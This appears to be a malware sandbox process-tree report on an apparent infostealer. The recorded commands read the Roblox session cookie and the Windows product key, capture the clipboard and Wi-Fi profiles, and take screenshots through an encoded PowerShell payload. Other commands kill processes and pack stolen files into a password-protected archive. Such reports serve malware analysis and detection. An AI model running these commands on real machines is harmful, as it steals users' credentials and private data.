      wmic csproduct get uuid
      4⤵
      PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:2936
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:876
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:5680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2300
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:664
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:5912
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:5164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:5300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2388
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4408
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2332
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:724
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3636
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:5656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      PID:5680
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3cvhxs2r\3cvhxs2r.cmdline"
        5⤵
        
        PID:4408
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4099.tmp" "c:\Users\Admin\AppData\Local\Temp\3cvhxs2r\CSCAFED4FF6AE26442BB129E199DD6D44DD.TMP"
        6⤵
        
        PID:6092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:876
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4036
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:5384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1864
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5856
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5480
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5776
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5500
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5820
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3180"
    3⤵
    PID:816
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3180
      4⤵
      Kills process with taskkill
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3140"
    3⤵
    PID:1864
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3140
      4⤵
      Kills process with taskkill
      PID:5404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4636"
    3⤵
    PID:1524
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4636
      4⤵
      Kills process with taskkill
      PID:432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3180"
    3⤵
    PID:1412
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3180
      4⤵
      Kills process with taskkill
      PID:5676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3140"
    3⤵
    PID:5164
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3140
      4⤵
      Kills process with taskkill
      PID:5908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1048"
    3⤵
    PID:5852
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1048
      4⤵
      Kills process with taskkill
      PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4636"
    3⤵
    PID:5600
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4636
      4⤵
      Kills process with taskkill
      PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3388"
    3⤵
    PID:5820
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3388
      4⤵
      Kills process with taskkill
      PID:5088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1048"
    3⤵
    PID:5184
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1048
      4⤵
      Kills process with taskkill
      PID:484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2704"
    3⤵
    PID:5384
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2704
      4⤵
      Kills process with taskkill
      PID:464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:6088
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3388"
    3⤵
    PID:660
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3388
      4⤵
      Kills process with taskkill
      PID:1008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2704"
    3⤵
    PID:4524
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2704
      4⤵
      Kills process with taskkill
      PID:2052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5512"
    3⤵
    PID:4736
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5512
      4⤵
      Kills process with taskkill
      PID:1708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5512"
    3⤵
    PID:1036
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5512
      4⤵
      Kills process with taskkill
      PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 924"
    3⤵
    PID:5344
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 924
      4⤵
      Kills process with taskkill
      PID:1884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 924"
    3⤵
    PID:3052
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 924
      4⤵
      Kills process with taskkill
      PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4944"
    3⤵
    PID:3184
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4944
      4⤵
      Kills process with taskkill
      PID:2496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4944"
    3⤵
    PID:3452
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4944
      4⤵
      Kills process with taskkill
      PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4792
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:6016
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39522\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\L3kJU.zip" *"
    3⤵
    PID:5656
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3732
  - - C:\Users\Admin\AppData\Local\Temp\_MEI39522\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI39522\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\L3kJU.zip" *
      4⤵
      Executes dropped EXE
      PID:5616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:5244
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5088
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:5412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4788
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:5340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1456
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:5984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2052
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:1512

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5216
- C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
  "C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x29c,0x2a0,0x2a4,0x278,0x2a8,0x10dc694,0x10dc6a0,0x10dc6ac
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
